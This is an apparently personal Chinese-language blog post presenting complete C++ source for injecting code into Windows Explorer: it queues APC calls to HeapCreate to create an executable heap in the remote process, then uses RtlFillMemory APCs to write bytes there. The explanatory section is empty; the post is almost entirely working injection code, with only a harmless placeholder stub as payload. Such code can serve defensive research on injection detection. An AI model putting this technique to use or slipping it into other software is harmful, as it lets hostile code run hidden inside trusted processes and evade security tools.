【注入】利用HeapCreate实现APC注入

概述:利用 HeapCreate 实现 APC 注入

原理

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
// NtQueueApcThread.cpp : 定义控制台应用程序的入口点。
//

#include <windows.h>
#include <winternl.h>

#pragma comment(lib,"ntdll.lib")
#define NTKERNELAPI DECLSPEC_IMPORT 
#define RTL_MAX_DRIVE_LETTERS 32
#define GDI_HANDLE_BUFFER_SIZE32  34
#define GDI_HANDLE_BUFFER_SIZE64  60
#define GDI_BATCH_BUFFER_SIZE 310

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

#if !defined(_M_X64)
#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE32
#else
#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE64
#endif

typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];

typedef struct _PEBX64 {
	BOOLEAN InheritedAddressSpace;
	BOOLEAN ReadImageFileExecOptions;
	BOOLEAN BeingDebugged;
	union
	{
		BOOLEAN BitField;
		struct
		{
			BOOLEAN ImageUsesLargePages : 1;
			BOOLEAN IsProtectedProcess : 1;
			BOOLEAN IsImageDynamicallyRelocated : 1;
			BOOLEAN SkipPatchingUser32Forwarders : 1;
			BOOLEAN IsPackagedProcess : 1;
			BOOLEAN IsAppContainer : 1;
			BOOLEAN IsProtectedProcessLight : 1;
			BOOLEAN IsLongPathAwareProcess : 1;
		};
	};
	HANDLE Mutant;

	PVOID ImageBaseAddress;
	PPEB_LDR_DATA Ldr;
	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
	PVOID SubSystemData;
	PVOID ProcessHeap;
	PRTL_CRITICAL_SECTION FastPebLock;
	PVOID AtlThunkSListPtr;
	PVOID IFEOKey;
	union
	{
		ULONG CrossProcessFlags;
		struct
		{
			ULONG ProcessInJob : 1;
			ULONG ProcessInitializing : 1;
			ULONG ProcessUsingVEH : 1;
			ULONG ProcessUsingVCH : 1;
			ULONG ProcessUsingFTH : 1;
			ULONG ProcessPreviouslyThrottled : 1;
			ULONG ProcessCurrentlyThrottled : 1;
			ULONG ReservedBits0 : 25;
		};
		ULONG EnvironmentUpdateCount;
	};
	union
	{
		PVOID KernelCallbackTable;
		PVOID UserSharedInfoPtr;
	};
	ULONG SystemReserved[1];
	ULONG AtlThunkSListPtr32;
	PVOID ApiSetMap;
	ULONG TlsExpansionCounter;
	PVOID TlsBitmap;
	ULONG TlsBitmapBits[2];
	PVOID ReadOnlySharedMemoryBase;
	PVOID HotpatchInformation;
	PVOID* ReadOnlyStaticServerData;
	PVOID AnsiCodePageData;
	PVOID OemCodePageData;
	PVOID UnicodeCaseTableData;

	ULONG NumberOfProcessors;
	ULONG NtGlobalFlag;

	LARGE_INTEGER CriticalSectionTimeout;
	SIZE_T HeapSegmentReserve;
	SIZE_T HeapSegmentCommit;
	SIZE_T HeapDeCommitTotalFreeThreshold;
	SIZE_T HeapDeCommitFreeBlockThreshold;

	ULONG NumberOfHeaps;
	ULONG MaximumNumberOfHeaps;
	PVOID* ProcessHeaps;

	PVOID GdiSharedHandleTable;
	PVOID ProcessStarterHelper;
	ULONG GdiDCAttributeList;

	PRTL_CRITICAL_SECTION LoaderLock;

	ULONG OSMajorVersion;
	ULONG OSMinorVersion;
	USHORT OSBuildNumber;
	USHORT OSCSDVersion;
	ULONG OSPlatformId;
	ULONG ImageSubsystem;
	ULONG ImageSubsystemMajorVersion;
	ULONG ImageSubsystemMinorVersion;
	ULONG_PTR ImageProcessAffinityMask;
	GDI_HANDLE_BUFFER GdiHandleBuffer;
	PVOID PostProcessInitRoutine;

	PVOID TlsExpansionBitmap;
	ULONG TlsExpansionBitmapBits[32];

	ULONG SessionId;

	ULARGE_INTEGER AppCompatFlags;
	ULARGE_INTEGER AppCompatFlagsUser;
	PVOID pShimData;
	PVOID AppCompatInfo;

	UNICODE_STRING CSDVersion;

	PVOID ActivationContextData;
	PVOID ProcessAssemblyStorageMap;
	PVOID SystemDefaultActivationContextData;
	PVOID SystemAssemblyStorageMap;

	SIZE_T MinimumStackCommit;

	PVOID* FlsCallback;
	LIST_ENTRY FlsListHead;
	PVOID FlsBitmap;
	ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
	ULONG FlsHighIndex;

	PVOID WerRegistrationData;
	PVOID WerShipAssertPtr;
	PVOID pContextData;
	PVOID pImageHeaderHash;
	union
	{
		ULONG TracingFlags;
		struct
		{
			ULONG HeapTracingEnabled : 1;
			ULONG CritSecTracingEnabled : 1;
			ULONG LibLoaderTracingEnabled : 1;
			ULONG SpareTracingBits : 29;
		};
	};
	ULONGLONG CsrServerReadOnlySharedMemoryBase;
} PEBX64, * PPEBX64;

#if false

typedef struct _CLIENT_ID {
	HANDLE UniqueProcess;
	HANDLE UniqueThread;
}CLIENT_ID, * PCLIENT_ID;
#else

typedef _CLIENT_ID* PCLIENT_ID;

#endif

#ifdef __cplusplus
extern "C" {
#endif
	NTKERNELAPI LONG NTAPI
		RtlCompareUnicodeString(
			IN PCUNICODE_STRING String1,
			IN PCUNICODE_STRING String2,
			IN BOOLEAN CaseInSensitive
		);

	NTKERNELAPI NTSTATUS NTAPI
		NtFsControlFile(
			__in HANDLE FileHandle,
			__in_opt HANDLE Event,
			__in_opt PIO_APC_ROUTINE ApcRoutine,
			__in_opt PVOID ApcContext,
			__out PIO_STATUS_BLOCK IoStatusBlock,
			__in ULONG IoControlCode,
			__in_bcount_opt(InputBufferLength) PVOID InputBuffer,
			__in ULONG InputBufferLength,
			__out_bcount_opt(OutputBufferLength) PVOID OutputBuffer,
			__in ULONG OutputBufferLength
		);

	NTKERNELAPI NTSTATUS NTAPI
		NtWriteFile(
			__in HANDLE FileHandle,
			__in_opt HANDLE Event,
			__in_opt PIO_APC_ROUTINE ApcRoutine,
			__in_opt PVOID ApcContext,
			__out PIO_STATUS_BLOCK IoStatusBlock,
			__in_bcount(Length) PVOID Buffer,
			__in ULONG Length,
			__in_opt PLARGE_INTEGER ByteOffset,
			__in_opt PULONG Key
		);

	NTKERNELAPI PIMAGE_NT_HEADERS NTAPI
		NTAPI
		RtlImageNtHeader(
			PVOID Base
		);

	NTKERNELAPI
		NTSTATUS
		NTAPI
		NtQueueApcThread(
			IN HANDLE ThreadHandle,
			IN FARPROC ApcRoutine,
			IN PVOID ApcArgument1,
			IN PVOID ApcArgument2,
			IN PVOID ApcArgument3
		);


	NTKERNELAPI
		NTSTATUS
		NTAPI NtCreateThreadEx(PHANDLE ThreadHandle,
			ACCESS_MASK DesiredAccess,
			LPVOID ObjectAttributes,
			HANDLE ProcessHandle,
			LPTHREAD_START_ROUTINE lpStartAddress,
			LPVOID lpParameter,
			BOOL CreateThreadFlags,
			DWORD  ZeroBits,
			DWORD  StackSize,
			DWORD  MaximumStackSize,
			PVOID lpBytesBuffer);

	NTKERNELAPI NTSTATUS NTAPI
		RtlCreateUserThread(
			IN HANDLE Process,
			IN PSECURITY_DESCRIPTOR ThreadSecurityDescriptor OPTIONAL,
			IN BOOLEAN CreateSuspended,
			IN ULONG ZeroBits OPTIONAL,
			IN SIZE_T MaximumStackSize OPTIONAL,
			IN SIZE_T CommittedStackSize OPTIONAL,
			IN LPTHREAD_START_ROUTINE StartAddress,
			IN PVOID Parameter OPTIONAL,
			OUT PHANDLE Thread OPTIONAL,
			OUT PCLIENT_ID ClientId OPTIONAL
		);
#ifdef __cplusplus
}
#endif
#define NT_CREATE_THREAD_EX_SUSPENDED 1
#define NT_CREATE_THREAD_EX_ALL_ACCESS 0x001FFFFF
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)


int _tmain(int argc, _TCHAR* argv[])
{
	HWND Shell_TrayWnd = FindWindow(L"Shell_TrayWnd", NULL);
	DWORD dwProcessId = 0;
	NTSTATUS Status;
	BOOL bRet = FALSE;
	HANDLE hThread = NULL;
	GetWindowThreadProcessId(Shell_TrayWnd, &dwProcessId);
	//HANDLE hProcess  = OpenProcess(PROCESS_VM_READ|PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION,FALSE,dwProcessId);
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if (hProcess)
	{
		ULONG URet = 0;
		SIZE_T SizeRet = 0;
		CLIENT_ID ClientId = { 0 };
		PEBX64 TheExplorerPeb = { 0 };
		PROCESS_BASIC_INFORMATION BasicInfo = { 0 };
		Status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &BasicInfo, sizeof(BasicInfo), &URet);
		bRet = ReadProcessMemory(hProcess, BasicInfo.PebBaseAddress, &TheExplorerPeb, sizeof(TheExplorerPeb), &SizeRet);
		ULONG UlHeapArraySize = TheExplorerPeb.NumberOfHeaps * sizeof(ULONG_PTR);
		PULONG_PTR UlOldHeapArray = (PULONG_PTR)new BYTE[UlHeapArraySize];
		bRet = ReadProcessMemory(hProcess, TheExplorerPeb.ProcessHeaps, UlOldHeapArray, UlHeapArraySize, &SizeRet);
		delete[]UlOldHeapArray;
		FARPROC RtlFillMemory = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "RtlFillMemory");
		//Status = NtCreateThreadEx(&hThread, NT_CREATE_THREAD_EX_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)ExitThread, (LPVOID)0, NT_CREATE_THREAD_EX_SUSPENDED, NULL, 0, 0, NULL);
		Status = RtlCreateUserThread(hProcess, NULL, TRUE, 0, 0, 0, (LPTHREAD_START_ROUTINE)ExitThread, NULL, &hThread, &ClientId);
		if (NT_SUCCESS(Status))
		{
			FARPROC HeapCreateProc = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "HeapCreate");
			Status = NtQueueApcThread(hThread, (FARPROC)HeapCreate, (PVOID)HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
			if (NT_SUCCESS(Status))
			{

				ResumeThread(hThread);
				WaitForSingleObject(hThread, INFINITE);
				CloseHandle(hThread);
			}
		}

		bRet = ReadProcessMemory(hProcess, BasicInfo.PebBaseAddress, &TheExplorerPeb, sizeof(TheExplorerPeb), &SizeRet);
		UlHeapArraySize = TheExplorerPeb.NumberOfHeaps * sizeof(ULONG_PTR);
		PULONG_PTR UlNewHeapArray = (PULONG_PTR)new BYTE[UlHeapArraySize];
		bRet = ReadProcessMemory(hProcess, TheExplorerPeb.ProcessHeaps, UlNewHeapArray, UlHeapArraySize, &SizeRet);


		HANDLE hTestHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
		LPVOID lpAllocMem = HeapAlloc(hTestHeap, 0, 0x2000);
		ULONG UlHeapOffset = (PBYTE)lpAllocMem - (PBYTE)hTestHeap;
		bRet = HeapFree(hTestHeap, 0, lpAllocMem);
		bRet = HeapDestroy(hTestHeap);
		ULONG_PTR UlRemoteXHeap = UlNewHeapArray[TheExplorerPeb.NumberOfHeaps - 1];
		ULONG_PTR UlWriteMemAdr = UlRemoteXHeap + UlHeapOffset;
		delete[]UlNewHeapArray;

		Status = RtlCreateUserThread(hProcess, NULL, TRUE, 0, 0, 0, (LPTHREAD_START_ROUTINE)ExitThread, NULL, &hThread, &ClientId);
		if (NT_SUCCESS(Status))
		{
			BYTE MemByte[] = { 0x33,0xc0,0xc3,0x90 };
			ULONG UlWrite = *(PULONG)MemByte;
			FARPROC HeapCreateProc = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "HeapCreate");
			Status = NtQueueApcThread(hThread, (FARPROC)HeapAlloc, (PVOID)UlRemoteXHeap, 0, (PVOID)0x2000);
			for (int i = 0; i < 4; i++)
			{
				Status = NtQueueApcThread(hThread, (FARPROC)RtlFillMemory, (PVOID)(UlWriteMemAdr + i), (PVOID)1, (PVOID) * (MemByte + i));
			}
			if (NT_SUCCESS(Status))
			{

				ResumeThread(hThread);
				WaitForSingleObject(hThread, INFINITE);
				CloseHandle(hThread);
			}
		}

	}

	return 0;
}


A_OS > Windows > Inject&Hook
#注入 #Inject&Hook
【注入】利用HeapCreate实现APC注入
https://hodlyounger.github.io/2024/10/18/A_OS/Windows/Inject&Hook/【注入】利用HeapCreate实现APC注入/
作者
mingming
发布于
2024年10月18日
许可协议